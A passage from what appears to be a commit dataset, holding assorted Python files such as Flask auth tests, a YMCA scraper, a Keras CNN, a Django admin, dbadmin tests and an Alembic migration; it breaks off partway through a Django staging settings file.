result = json.loads(response.data)
self.assertEqual(response.status_code, 200)
self.assertEqual(result["message"],
'User registration successful.')
self.assertEqual(result['username'],
self.user['username'])
def test_duplicate_user_registration(self):
"""Test registered user registration."""
resp = self.client().post('/auth/register/',
data=json.dumps(self.user),
content_type='application/json')
self.assertEqual(resp.status_code, 200)
res = self.client().post('/auth/register/',
data=json.dumps(self.user),
content_type='application/json')
self.assertEqual(res.status_code, 409)
result = json.loads(res.data)
self.assertEqual(result['message'],
"User with the username already exists.")
def test_login_successful(self):
"""Test successful user login."""
resp = self.client().post('/auth/register/',
data=json.dumps(self.user),
content_type="application/json")
self.assertEqual(resp.status_code, 200)
res = self.client().post('/auth/login/',
data=json.dumps(self.user),
content_type="application/json")
self.assertEqual(res.status_code, 200)
result = json.loads(res.data)
self.assertEqual(result['message'],
"Login successful.")
def test_unauthorised_login_attempt(self):
"""Test unauthorised login attempt."""
res = self.client().post('/auth/login/',
data=json.dumps(self.user),
content_type="application/json")
self.assertEqual(res.status_code, 401)
result = json.loads(res.data)
self.assertEqual(result['message'],
"Invalid username/password.")
def test_incomplete_login_credentials(self):
"""Test partial issue of login credentials"""
res = self.client().post('/auth/login/',
data=json.dumps({"username": "nerd"}),
content_type="application/json")
result = json.loads(res.data)
self.assertEqual(result['error'],
"missing data in request.")
def tearDown(self):
"""teardown all initialized variables."""
with self.app.app_context():
# drop all tables
db.session.remove()
db.drop_all()
if __name__ == '__main__':
unittest.main()
| Python | 0.000048 | |
af2654df47b8b7ea60d78fd7f692e911c2d3a82c | allow oveerride of font used | tests/text_test.py | tests/text_test.py | import sys
import os
import time
import pyglet.window
from pyglet.window.event import *
from pyglet.GL.VERSION_1_1 import *
from pyglet.GLU.VERSION_1_1 import *
from pyglet import clock
from pyglet.text import Font
from ctypes import *
factory = pyglet.window.WindowFactory()
factory.config._attributes['doublebuffer'] = 1
w1 = factory.create(width=400, height=200)
if len(sys.argv) == 2:
filename = sys.argv[1]
else:
filename = os.path.join(os.path.split(__file__)[0], 'Vera.ttf')
font = Font.load_font(filename, 72)
text = font.render('Hello World!')
exit_handler = ExitHandler()
w1.push_handlers(exit_handler)
c = clock.Clock()
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(0, w1.width, 0, w1.height, -1, 1)
glEnable(GL_COLOR_MATERIAL)
glMatrixMode(GL_MODELVIEW)
glClearColor(0, 0, 0, 0)
glColor4f(1, 1, 1, 1)
r = 0
while not exit_handler.exit:
c.set_fps(60)
w1.dispatch_events()
glClear(GL_COLOR_BUFFER_BIT)
glLoadIdentity()
#r += 1
if r > 360: r = 0
glTranslatef(w1.width/2, w1.height/2, 0)
glRotatef(r, 0, 0, 1)
glTranslatef(-text.width/2, -text.height/2, 0)
text.draw()
w1.flip()
| import sys
import os
import time
import pyglet.window
from pyglet.window.event import *
from pyglet.GL.VERSION_1_1 import *
from pyglet.GLU.VERSION_1_1 import *
from pyglet import clock
from pyglet.text import Font
from ctypes import *
factory = pyglet.window.WindowFactory()
factory.config._attributes['doublebuffer'] = 1
w1 = factory.create(width=400, height=200)
filename = os.path.join(os.path.split(__file__)[0], 'Vera.ttf')
font = Font.load_font(filename, 72)
text = font.render('Hello World!')
exit_handler = ExitHandler()
w1.push_handlers(exit_handler)
c = clock.Clock()
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(0, w1.width, 0, w1.height, -1, 1)
glEnable(GL_COLOR_MATERIAL)
glMatrixMode(GL_MODELVIEW)
glClearColor(0, 0, 0, 0)
glColor4f(1, 1, 1, 1)
r = 0
while not exit_handler.exit:
c.set_fps(60)
w1.dispatch_events()
glClear(GL_COLOR_BUFFER_BIT)
glLoadIdentity()
#r += 1
if r > 360: r = 0
glTranslatef(w1.width/2, w1.height/2, 0)
glRotatef(r, 0, 0, 1)
glTranslatef(-text.width/2, -text.height/2, 0)
text.draw()
w1.flip()
| Python | 0 |
73e3d7140a6bf24375e08498f754eeac827ca9a1 | Add spider for YMCA | locations/spiders/ymca.py | locations/spiders/ymca.py | # -*- coding: utf-8 -*-
from datetime import datetime
import json
import re
from urllib.parse import urlencode
import scrapy
from locations.items import GeojsonPointItem
from locations.hours import OpeningHours
SINGLE_POINT_STATES = [
("0,64.0685,-152.2782,AK"),
("1,20.6538883744,-157.8631750471,HI"),
]
HUNDRED_MILES_STATES = {"MT", "WY", "SD", "ND", "NE", "NV", "AZ", "NM", "UT", "ID"}
TWENTYFIVE_MILES_STATES = {"MD", "OH", "FL", "IL", "IA", "WI", "MN", "RI", "MA", "NH",
"SC", "NC", "NJ", "WA", "CA", "PA", "NY"}
class YmcaSpider(scrapy.Spider):
name = "ymca"
allowed_domains = ["ymca.net"]
download_delay = 0.5
def start_requests(self):
url = 'https://www.ymca.net/find-your-y/?'
for point in SINGLE_POINT_STATES:
_, lat, lon, state = point.strip().split(',')
params = {"address": "{},{}".format(lat, lon)}
yield scrapy.Request(url=url + urlencode(params))
with open('./locations/searchable_points/us_centroids_100mile_radius_state.csv') as points:
next(points)
for point in points:
_, lat, lon, state = point.strip().split(',')
if state in HUNDRED_MILES_STATES:
params = {"address": "{},{}".format(lat, lon)}
yield scrapy.Request(url=url + urlencode(params))
with open('./locations/searchable_points/us_centroids_25mile_radius_state.csv') as points:
next(points)
for point in points:
_, lat, lon, state = point.strip().split(',')
if state in TWENTYFIVE_MILES_STATES:
params = {"address": "{},{}".format(lat, lon)}
yield scrapy.Request(url=url + urlencode(params))
with open('./locations/searchable_points/us_centroids_50mile_radius_state.csv') as points:
next(points)
for point in points:
_, lat, lon, state = point.strip().split(',')
if state not in HUNDRED_MILES_STATES.union(TWENTYFIVE_MILES_STATES).union({"AK", "HI"}):
params = {"address": "{},{}".format(lat, lon)}
yield scrapy.Request(url=url + urlencode(params))
def parse_hours(self, hours):
opening_hours = OpeningHours()
for hour in hours:
hour = hour.strip()
if hour == "Hours of Operation:":
continue
try:
day, open_time, close_time = re.search(r'(.*?):\s(.*?)\s-\s(.*?)$', hour).groups()
except AttributeError: # closed
continue
open_time = open_time.replace('.', '')
close_time = close_time.replace('.', '')
open_time = (datetime.strptime(open_time, '%I:%M %p')
if ":" in open_time
else datetime.strptime(open_time, '%I %p')).strftime('%H:%M')
close_time = (datetime.strptime(close_time, '%I:%M %p')
if ":" in close_time
else datetime.strptime(close_time, '%I %p')).strftime('%H:%M')
opening_hours.add_range(day=day[:2],
open_time=open_time,
close_time=close_time,
time_format='%H:%M')
return opening_hours.as_opening_hours()
def parse_location(self, response):
p = response.xpath('//main//p[1]/text()').extract()
p = [x.strip() for x in p if x.strip()]
phone = p.pop(-1) # last line is phone number
city, state, postcode = re.search(r'(.*?), ([A-Z]{2}) ([\d-]+)$', p.pop(-1)).groups() # next to last line is city/state/zip
address = " ".join(p) # every thing left is street address
properties = {
'ref': re.search(r'.+/?id=(.+)', response.url).group(1),
'name': response.xpath('//main//h1/text()').extract_first(),
'addr_full': address,
'city': city,
'state': state,
'postcode': postcode,
'country': 'US',
'lat': float(response.xpath('//div[@id="y-profile-position"]/@data-latitude').extract_first()),
'lon': float(response.xpath('//div[@id="y-profile-position"]/@data-longitude').extract_first()),
'phone': phone.replace("Phone: ", ""),
'website': response.xpath('//div[@id="y-profile-position"]/@data-url').extract_first()
}
properties['opening_hours'] = self.parse_hours(response.xpath('//main//p[contains(text(), "Hours")]/text()').extract())
yield GeojsonPointItem(**properties)
def parse(self, response):
urls = response.xpath('//main//ul[not(contains(@class, "ymca-pagination"))]/li/h3//a/@href').extract()
for url in urls:
yield scrapy.Request(response.urljoin(url), callback=self.parse_location)
| Python | 0.000003 | |
4e5a1a799bea020c145e544de255e3322ecc5aed | add kerasCNN | kerasCNN.py | kerasCNN.py | from __future__ import absolute_import
from __future__ import print_function
import numpy as np
import pandas as pd
np.random.seed(1337) # for reproducibility
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation, Flatten
from keras.layers.convolutional import Convolution2D, MaxPooling2D
from keras.layers.normalization import BatchNormalization
from keras.layers.advanced_activations import PReLU
from keras.utils import np_utils, generic_utils
from keras.optimizers import Adam, SGD, Optimizer
from keras.callbacks import Callback, EarlyStopping, ModelCheckpoint
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import confusion_matrix, log_loss
from sklearn.ensemble import BaggingClassifier
from sklearn.cross_validation import StratifiedKFold, KFold
path = './'
batch_size = 256
nb_classes = 10
img_rows, img_cols = 28, 28 # input image dimensions
nb_filters = 32 # number of convolutional filters to use
nb_pool = 2 # 2 size of pooling area for max pooling
nb_conv = 3 # 3 convolution kernel size
# the data, shuffled and split between tran and test sets
train = pd.read_csv(path+'train.csv')
labels = train['label']
del train['label']
test = pd.read_csv(path+'test.csv')
train = train.values
train = train.reshape(train.shape[0], 1, img_rows, img_cols)
test = test.values
test = test.reshape(test.shape[0], 1, img_rows, img_cols)
train = train.astype("float32")
test = test.astype("float32")
train /= 255
test /= 255
print('train shape:', train.shape)
print(train.shape[0], 'train samples')
print(test.shape[0], 'test samples')
label = np_utils.to_categorical(labels, nb_classes)
# convert class vectors to binary class matrices
N = train.shape[0]
trainId = np.array(range(N))
submissionTr = pd.DataFrame(index=trainId,columns=np.array(range(10)))
nfold=5
RND = np.random.randint(0,10000,nfold)
pred = np.zeros((test.shape[0],10))
score = np.zeros(nfold)
i=0
skf = StratifiedKFold(labels, nfold, random_state=1337)
for tr, te in skf:
X_train, X_valid, y_train, y_valid = train[tr], train[te], label[tr], label[te]
predTr = np.zeros((X_valid.shape[0],10))
n_bag=5
for j in range(n_bag):
print('nfold: ',i,'/',nfold, ' n_bag: ',j,' /',n_bag)
print("Building model...")
model = Sequential()
model.add(Convolution2D(nb_filters, nb_conv, nb_conv,
border_mode='full',
input_shape=(1, img_rows, img_cols)))
model.add(Activation('relu'))
model.add(Convolution2D(nb_filters, nb_conv, nb_conv))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))
model.add(Dropout(0.25))
model.add(Activation('relu'))
model.add(Convolution2D(nb_filters, nb_conv, nb_conv))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(128))
model.add(Activation('relu'))
model.add(Dropout(0.25))
model.add(Dense(nb_classes))
model.add(Activation('softmax'))
earlystopping=EarlyStopping(monitor='val_loss', patience=10, verbose=1)
checkpointer = ModelCheckpoint(filepath=path+"weights.hdf5", verbose=0, save_best_only=True)
model.compile(loss='categorical_crossentropy', optimizer='adadelta')
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=1000, show_accuracy=True,
verbose=2, validation_data=(X_valid,y_valid), callbacks=[earlystopping,checkpointer])
model.load_weights(path+"weights.hdf5")
print("Generating submission...")
pred += model.predict_proba(test)
predTr += model.predict_proba(X_valid)
predTr /= n_bag
submissionTr.iloc[te] = predTr
score[i]= log_loss(y_valid,predTr,eps=1e-15, normalize=True)
print(score[i])
i+=1
pred /= (nfold * n_bag)
print("ave: "+ str(np.average(score)) + "stddev: " + str(np.std(score)))
print(confusion_matrix(labels, submissionTr.idxmax(axis=1)))
pd.DataFrame(pred).to_csv(path+"kerasCNN.csv",index_label='ImageId')
Label=pd.DataFrame(pred).idxmax(axis=1)
submission = pd.DataFrame({'ImageId': np.array(range(test.shape[0]))+1, 'Label': Label})
submission.to_csv(path+"kerasCNN_submission.csv",index=False)
print(log_loss(labels,submissionTr.values,eps=1e-15, normalize=True))
submissionTr.to_csv(path+"kerasCNN_stack.csv",index_label='ImageId')
# nfold 5, bagging 5: 0.020957301 + 0.00140977765 , Public LB: 0.99371
# batch_size 256: 0.0203983009777 + 0.00172547876286, Public LB: 0.99414
| Python | 0.999712 | |
7336cc3c89727383c7a9cbbf564f6cfce7f198f9 | add similiarty3.py | app/find_similarity3.py | app/find_similarity3.py | import sys
import string
import requests
import json
import pymysql
import numpy as np
import pandas as pd
from operator import itemgetter
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.decomposition import PCA, RandomizedPCA, TruncatedSVD
from sklearn.preprocessing import Normalizer
def find_companies(investorname):
investorname = np.int(investorname)
rmatrix= np.loadtxt(open("investorcompanyPCA.csv"),delimiter=",")
investor_id = np.loadtxt(open("investorIDorder.csv"),delimiter=",")
investor_id = investor_id.astype(int)
count=0
score = []
target=[]
for row in investor_id:
if row == investorname:
target = rmatrix[count]
break
count += 1
counter2 = 0
for row in rmatrix:
#score.append([cosine_similarity(target,row).tolist()[0][0], investor_id[counter2]])
score.append({u'similarity': cosine_similarity(target,row).tolist()[0][0], u'investor_id': investor_id[counter2]})
counter2 += 1
#score = sorted(score,reverse=True)
con = pymysql.connect(host='localhost', user='root', passwd='****')
cur = con.cursor()
cur.execute('''USE Venturenetwork16;''')
current_query='''SELECT startupID FROM Investor_comp'''
company_total = pd.io.sql.frame_query(current_query, con)
company_total = list(company_total['startupID'])
similarcomp=[]
current_query='''SELECT * FROM Investor_comp'''
rows = pd.io.sql.frame_query(current_query, con)
df = pd.Series(list(rows['startupID']),list(rows['investor_id']))
score = sorted(score,key=itemgetter('similarity'),reverse=True)
similarcomp = []
for investor_row in score[1:20]:
for company in list(df[investor_row['investor_id']]):
similarcomp.append([company, investor_row['similarity']])
companyid = [ row[0] for row in similarcomp ]
companysim = [ row[1] for row in similarcomp ]
uniquecompID = list(set(companyid))
uniquesimcomp = []
for company in uniquecompID:
compscore = 0
for company2 in similarcomp:
if company == company2[0] and company not in list(df[investorname]):
compscore += company2[1]
uniquesimcomp.append([compscore, company])
return sorted(uniquesimcomp, reverse=True)[0:40], score
if __name__ == "__main__":
[uniquesimcomp,score] = find_companies(sys.argv[1])
print [uniquesimcomp,score]
| Python | 0 | |
08988d19c712ad4604f0acced71a069c7c20067a | Add kv store for file storage | zou/app/stores/file_store.py | zou/app/stores/file_store.py | import flask_fs as fs
from zou.app import app
pictures = fs.Storage("pictures", overwrite=True)
movies = fs.Storage("movies", overwrite=True)
pictures.configure(app)
movies.configure(app)
def make_key(prefix, id):
return "%s-%s" % (prefix, id)
def add_picture(prefix, id, path):
key = make_key(prefix, id)
with open(path, 'rb') as fd:
return pictures.write(key, fd)
def get_picture(prefix, id):
key = make_key(prefix, id)
return pictures.read(key)
def open_picture(prefix, id):
key = make_key(prefix, id)
return pictures.open(key, 'rb')
def exists_picture(prefix, id):
key = make_key(prefix, id)
return pictures.exists(key)
def remove_picture(prefix, id):
key = make_key(prefix, id)
pictures.delete(key)
def add_movie(prefix, id, content):
key = make_key(prefix, id)
return movies.write(key, content)
def get_movie(prefix, id):
key = make_key(prefix, id)
return movies.read(key)
def open_movie(prefix, id):
key = make_key(prefix, id)
return movies.open(key, 'rb')
def exists_movie(prefix, id):
key = make_key(prefix, id)
return movies.exists(key)
def remove_movie(prefix, id):
key = make_key(prefix, id)
movies.delete(key)
| Python | 0 | |
56c27d56ca16f6659a478af0b6529291b1140636 | Create find-peak-element-ii.py | Python/find-peak-element-ii.py | Python/find-peak-element-ii.py | # Time: O(max(m, n))
# Space: O(1)
class Solution:
#@param A: An list of list integer
#@return: The index of position is a list of integer, for example [2,2]
def findPeakII(self, A):
upper, down = 0, len(A) - 1
left, right = 0, len(A[0]) - 1
while upper < down and left < right:
height = down - upper + 1
width = right - left + 1
# T(m, n) = T(m / 2, n / 2) + O(m) + O(n / 2) = O(max(m, n))
if width > height: # Vertical split.
mid_j = left + (right - left) / 2
left_max, central_max, right_max = 0, 0, 0
max_i, max_j = -1, -1
for i in xrange(upper+1, down):
if A[i][mid_j] > central_max:
max_i, max_j = i, mid_j
central_max = A[i][mid_j]
left_max = max(left_max, A[i][mid_j - 1])
right_max = max(right_max, A[i][mid_j + 1])
if left_max > central_max and left_max > right_max: # Find left.
right = mid_j
elif right_max > central_max and right_max > left_max: # Find right.
left = mid_j
else: # Find one peak.
return [max_i, max_j]
else: # Horizontal split.
mid_i = upper + (down - upper) / 2
upper_max, central_max, down_max = 0, 0, 0
max_i, max_j = 0, 0
for j in xrange(left + 1, right):
if A[mid_i][j] > central_max:
max_i, max_j = mid_i, j
central_max = A[mid_i][j]
upper_max = max(upper_max, A[mid_i - 1][j])
down_max = max(down_max, A[mid_i + 1][j])
if upper_max > central_max and upper_max > down_max: # Find upper.
down = mid_i
elif down_max > central_max and down_max > upper_max: # Find down.
upper = mid_i
else: # Find one peak.
return [max_i, max_j]
return [-1, -1] # Not found.
| Python | 0.00137 | |
49882e51faa26dbaa17a5f3510f0ba215b317dac | add simple test | test/simple.py | test/simple.py | import matplotlib.pyplot as plt
import numpy
numpy.random.seed(0)
N = 1000
Ne = N * 0.8
Ni = N - Ne
a = numpy.concatenate((
0.02 * numpy.ones((Ne, 1)),
0.1 * numpy.ones((Ni, 1))
))
b = numpy.concatenate((
0.2 * numpy.ones((Ne, 1)),
0.2 * numpy.ones((Ni, 1))
))
c = numpy.concatenate((
-65 * numpy.ones((Ne, 1)),
-65 * numpy.ones((Ni, 1))
))
d = numpy.concatenate((
8 * numpy.ones((Ne, 1)),
2 * numpy.ones((Ni, 1))
))
S = numpy.concatenate((
0.5 * numpy.random.rand(N, Ne),
-1.0 * numpy.random.rand(N, Ni)), axis=1)
v = -65 * numpy.ones((N, 1))
u = numpy.multiply(b, v)
firings = [[], []]
for t in range(1000):
I = 13 * (numpy.random.rand(N, 1) - 0.5)
fired = numpy.argwhere(v >= 30)[:,0]
if fired.size > 0:
for firing in fired:
firings[0].append(t)
firings[1].append(firing)
v[fired] = c[fired]
u[fired] += d[fired]
I += numpy.sum(S[:, fired], 1).reshape((N, 1))
v = v + (0.04 * numpy.square(v) + 5 * v + 140 - u + I)
u = u + numpy.multiply(a, numpy.multiply(b, v) - u)
plt.scatter(
firings[0],
firings[1],
color="black",
marker=".")
plt.show()
| Python | 0.000011 | |
32c5a681c7dd498204d38d5d1152aa7f67e09069 | Add feedback entries to the Admin panel | taiga/feedback/admin.py | taiga/feedback/admin.py | # Copyright (C) 2014 Andrey Antukh <niwi@niwi.be>
# Copyright (C) 2014 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2014 David Barragán <bameda@dbarragan.com>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.contrib import admin
from . import models
class FeedbackEntryAdmin(admin.ModelAdmin):
list_display = ['created_date', 'full_name', 'email' ]
list_display_links = list_display
list_filter = ['created_date',]
date_hierarchy = "created_date"
ordering = ("-created_date", "id")
search_fields = ("full_name", "email", "id")
admin.site.register(models.FeedbackEntry, FeedbackEntryAdmin)
| Python | 0 | |
bcc6639b2a60542b165c38bcff4211d2ed7db816 | add unit tests for dbadmin | testDBAdmin.py | testDBAdmin.py | import unittest
import dbadmin
from unittest.mock import call
from unittest.mock import patch
from unittest.mock import PropertyMock
class TestDBAdmin(unittest.TestCase):
def testHumanizeTime(self):
self.assertEqual(dbadmin.humanize_time(0), '00:00')
self.assertEqual(dbadmin.humanize_time(100), '01:00')
self.assertEqual(dbadmin.humanize_time(525), '05:15')
self.assertEqual(dbadmin.humanize_time(1050), '10:30')
self.assertEqual(dbadmin.humanize_time(1200), '12:00')
self.assertEqual(dbadmin.humanize_time(2275), '22:45')
self.assertEqual(dbadmin.humanize_time(2400), '24:00')
def testDehumanizeTime(self):
self.assertEqual(dbadmin.dehumanize_time('00:00'), 0)
self.assertEqual(dbadmin.dehumanize_time('01:00'), 100)
self.assertEqual(dbadmin.dehumanize_time('05:15'), 525)
self.assertEqual(dbadmin.dehumanize_time('08:50'), 900)
self.assertEqual(dbadmin.dehumanize_time('10:30'), 1050)
self.assertEqual(dbadmin.dehumanize_time('12:00'), 1200)
self.assertEqual(dbadmin.dehumanize_time('22:45'), 2275)
self.assertEqual(dbadmin.dehumanize_time('24:00'), 2400)
def testConsolidateTimes(self):
self.assertListEqual(dbadmin.consolidate_times([]), [])
self.assertListEqual(dbadmin.consolidate_times([(0, 25),
(25, 50),
(50, 75),
(75, 100)]),
[(0, 100)])
self.assertListEqual(dbadmin.consolidate_times([(0, 25),
(50, 75),
(100, 125)]),
[(0, 25), (50, 75), (100, 125)])
self.assertListEqual(dbadmin.consolidate_times([(0,25),
(25, 50),
(75,100),
(100, 125)]),
[(0, 50), (75, 125)])
@patch('dbadmin.DBAdmin.conn', new_callable=PropertyMock)
@patch('dbadmin.DBAdmin.c', new_callable=PropertyMock)
def testAddRoom(self, *unused_args):
dba = dbadmin.DBAdmin()
dba.add_room('MS160')
dba.c.executemany.assert_called()
dba.conn.commit.assert_called_once()
@patch('dbadmin.DBAdmin.add_room')
@patch('dbadmin.DBAdmin.conn', new_callable=PropertyMock)
@patch('dbadmin.DBAdmin.c', new_callable=PropertyMock)
def testAddTime(self, *unused_args):
dba = dbadmin.DBAdmin()
dba.add_time('MS160', 'M', '10:00', '10:50')
calls = [call('UPDATE rooms SET taken = 1 WHERE room = "MS160" '
'AND day = 1 AND time = 1000'),
call('UPDATE rooms SET taken = 1 WHERE room = "MS160" '
'AND day = 1 AND time = 1025'),
call('UPDATE rooms SET taken = 1 WHERE room = "MS160" '
'AND day = 1 AND time = 1050'),
call('UPDATE rooms SET taken = 1 WHERE room = "MS160" '
'AND day = 1 AND time = 1075')]
dba.c.execute.assert_has_calls(calls)
dba.add_room.assert_not_called()
@patch('dbadmin.DBAdmin.conn', new_callable=PropertyMock)
@patch('dbadmin.DBAdmin.c', new_callable=PropertyMock)
def testCheckRoom(self, *unused_args):
dba = dbadmin.DBAdmin()
dba.c.execute.return_value = []
self.assertEqual(dba.check_room('MS160', 'M'), [])
dba.c.execute.return_value = [(0, 25), (25, 50), (50, 75), (75, 100)]
self.assertEqual(dba.check_room('MS160', 'M'), [('00:00', '01:00')])
dba.c.execute.return_value = [(0, 25), (25, 50), (75, 100), (100, 125)]
self.assertEqual(dba.check_room('MS160', 'M'),
[('00:00', '00:30'), ('00:45', '01:15')])
dba.c.execute.return_value = [(0, 25), (50, 75), (100, 125)]
self.assertEqual(dba.check_room('MS160', 'M'),
[('00:00', '00:15'), ('00:30', '00:45'), ('01:00', '01:15')])
@patch('dbadmin.DBAdmin.conn', new_callable=PropertyMock)
@patch('dbadmin.DBAdmin.c', new_callable=PropertyMock)
def testFindRoom(self, *unused_args):
dba = dbadmin.DBAdmin()
dba.c.execute.return_value = []
self.assertEqual(dba.find_room('M', '00:00', '00:15'), {})
dba.c.execute.return_value = [('MS160', 0), ('MS160', 25), ('MS160', 50)]
self.assertEqual(dba.find_room('M', '00:00', '00:15'), {'MS160':[(0, 75)]})
dba.c.execute.return_value = [('MS160', 0), ('MS160', 25), ('MS160', 50)]
self.assertEqual(dba.find_room('M', '00:00'), {})
dba.c.execute.return_value = [('MS160', 0), ('MS160', 25), ('MS160', 50)]
self.assertEqual(dba.find_room('M', end='24:00'), {})
if __name__ == '__main__':
unittest.main()
| Python | 0 | |
f68b1a9d5aa2c36f9301588a55bc217a9ed120c1 | Create PowerofThree_001.py | leetcode/326-Power-of-Three/PowerofThree_001.py | leetcode/326-Power-of-Three/PowerofThree_001.py | class Solution(object):
def isPowerOfThree(self, n):
"""
:type n: int
:rtype: bool
"""
return n > 0 and 3 ** round(math.log(n, 3)) == n
| Python | 0.000002 | |
6c00711a5440fe958691c8064227565461e0acdf | add tools for laa analysis | sequana/laa.py | sequana/laa.py | from sequana import BAM
import glob
import pandas as pd
import pylab
class LAA():
def __init__(self, where="bc*"):
self.filenames = glob.glob(where + "/" + "amplicon_*summary.csv")
self.data = [pd.read_csv(this) for this in self.filenames]
def hist_amplicon(self, fontsize=12):
data = [len(x) for x in self.data]
pylab.hist(data, bins=max(data), ec="k")
pylab.ylabel("#", fontsize=fontsize)
pylab.ylabel("Number of amplicons per barcode", fontsize=fontsize)
class LAA_Assembly():
"""
Input is a SAM/BAM from the mapping of amplicon onto a known reference.
Based on the position, we can construct the new reference.
"""
def __init__(self, filename):
self.bam = BAM(filename)
def build_reference(self):
self.bam.reset()
# scan BAM file assuming it is small
aa = [a for a in self.bam]
# retrieve data of interest
data = [(a.pos, {
"name":a.query_name,
"sequence": a.query_sequence,
"cigar": a.cigarstring,
"position": a.pos,
"qstart": a.qstart,
"qend": a.qend}) for a in aa]
# sort by starting position
data.sort(key=lambda x: x[0])
for i, read in enumerate(data):
read = read[1]
if i == 0:
sequence = read["sequence"] # 2 is query_sequence
else:
pr = data[i-1][1] # previous read
L = len(pr["sequence"])
end_position_pr = pr['position'] - pr['qstart'] + L
# overlap between previous read and this one
overlap = end_position_pr - (read['position'] - read['qstart']) +0
print(overlap)
print(pr['position'], pr['qstart'], L, end_position_pr)
print(read['position'], read['qstart'])
sequence = sequence + read["sequence"][overlap+1:]
# argmax([sum(a==b for a,b in zip(X[-i:] , Y[:i]))/float(i+1) for i in range(1000)])
return sequence
def save_fasta(self, filename, sequence=None):
if sequence is None:
sequence = self.build_reference()
with open(filename, "w") as fout:
fout.write(">test\n{}".format(sequence))
| Python | 0 | |
bbbe3b7d79d57e350b1203a636b6ea64fe818caa | Update migration chain | src/ggrc/migrations/versions/20160421141928_1257140cbce5_delete_responses_table.py | src/ggrc/migrations/versions/20160421141928_1257140cbce5_delete_responses_table.py | # Copyright (C) 2016 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: goodson@google.com
# Maintained By: goodson@google.com
"""Delete responses table and any other references to responses
Create Date: 2016-04-21 14:19:28.527745
"""
# disable Invalid constant name pylint warning for mandatory Alembic variables.
# pylint: disable=invalid-name
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = '1257140cbce5'
down_revision = '5599d1769f25'
def upgrade():
"""Upgrade database schema and/or data, creating a new revision."""
op.drop_constraint('meetings_ibfk_3', 'meetings', type_='foreignkey')
op.drop_column('meetings', 'response_id')
op.drop_table('responses')
def downgrade():
"""Downgrade database schema and/or data back to the previous revision."""
op.create_table(
'responses',
sa.Column('title', sa.String(length=250), nullable=False),
sa.Column('request_id', sa.Integer(), nullable=False),
sa.Column(
'response_type',
sa.Enum(u'documentation', u'interview', u'population sample'),
nullable=False),
sa.Column('status', sa.String(length=250), nullable=False),
sa.Column('population_worksheet_id', sa.Integer(), nullable=False),
sa.Column('population_count', sa.Integer(), nullable=False),
sa.Column('sample_worksheet_id', sa.Integer(), nullable=False),
sa.Column('sample_count', sa.Integer(), nullable=False),
sa.Column('sample_evidence_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['request_id'], ['requests.id']),
sa.ForeignKeyConstraint(['population_worksheet_id'], ['documents.id']),
sa.ForeignKeyConstraint(['sample_worksheet_id'], ['documents.id']),
sa.ForeignKeyConstraint(['sample_evidence_id'], ['documents.id']),
sa.Index('population_worksheet_document', 'population_worksheet_id'),
sa.Index('sample_evidence_document', 'sample_evidence_id'),
sa.Index('sample_worksheet_document', 'sample_worksheet_id')
)
op.add_column(
'meetings', sa.Column('response_id', sa.Integer(), nullable=False))
op.create_foreign_key(
'meetings_ibfk_3', 'meetings', 'responses', ['response_id'], ['id'])
| # Copyright (C) 2016 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: dan@reciprocitylabs.com
# Maintained By: peter@reciprocitylabs.com
"""Delete responses table and any other references to responses
Create Date: 2016-04-21 14:19:28.527745
"""
# disable Invalid constant name pylint warning for mandatory Alembic variables.
# pylint: disable=invalid-name
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = '1257140cbce5'
down_revision = '33459bd8b70d'
def upgrade():
"""Upgrade database schema and/or data, creating a new revision."""
op.drop_constraint('meetings_ibfk_3', 'meetings', type_='foreignkey')
op.drop_column('meetings', 'response_id')
op.drop_table('responses')
def downgrade():
"""Downgrade database schema and/or data back to the previous revision."""
op.create_table(
'responses',
sa.Column('title', sa.String(length=250), nullable=False),
sa.Column('request_id', sa.Integer(), nullable=False),
sa.Column(
'response_type',
sa.Enum(u'documentation', u'interview', u'population sample'),
nullable=False),
sa.Column('status', sa.String(length=250), nullable=False),
sa.Column('population_worksheet_id', sa.Integer(), nullable=False),
sa.Column('population_count', sa.Integer(), nullable=False),
sa.Column('sample_worksheet_id', sa.Integer(), nullable=False),
sa.Column('sample_count', sa.Integer(), nullable=False),
sa.Column('sample_evidence_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['request_id'], ['requests.id']),
sa.ForeignKeyConstraint(['population_worksheet_id'], ['documents.id']),
sa.ForeignKeyConstraint(['sample_worksheet_id'], ['documents.id']),
sa.ForeignKeyConstraint(['sample_evidence_id'], ['documents.id']),
sa.Index('population_worksheet_document', 'population_worksheet_id'),
sa.Index('sample_evidence_document', 'sample_evidence_id'),
sa.Index('sample_worksheet_document', 'sample_worksheet_id')
)
op.add_column(
'meetings', sa.Column('response_id', sa.Integer(), nullable=False))
op.create_foreign_key(
'meetings_ibfk_3', 'meetings', 'responses', ['response_id'], ['id'])
| Python | 0.000001 |
1d3327d8d804a6e53c020e69b77efbea2086379b | Add staging settings file | manchester_traffic_offences/settings/staging.py | manchester_traffic_offences/settings/staging.py | from .base import *
import os
DEBUG = False
TEMPLATE_DEBUG = DEBUG
INSTALLED_APPS += ('raven.contrib.django.raven_compat', )
RAVEN_CONFIG = {
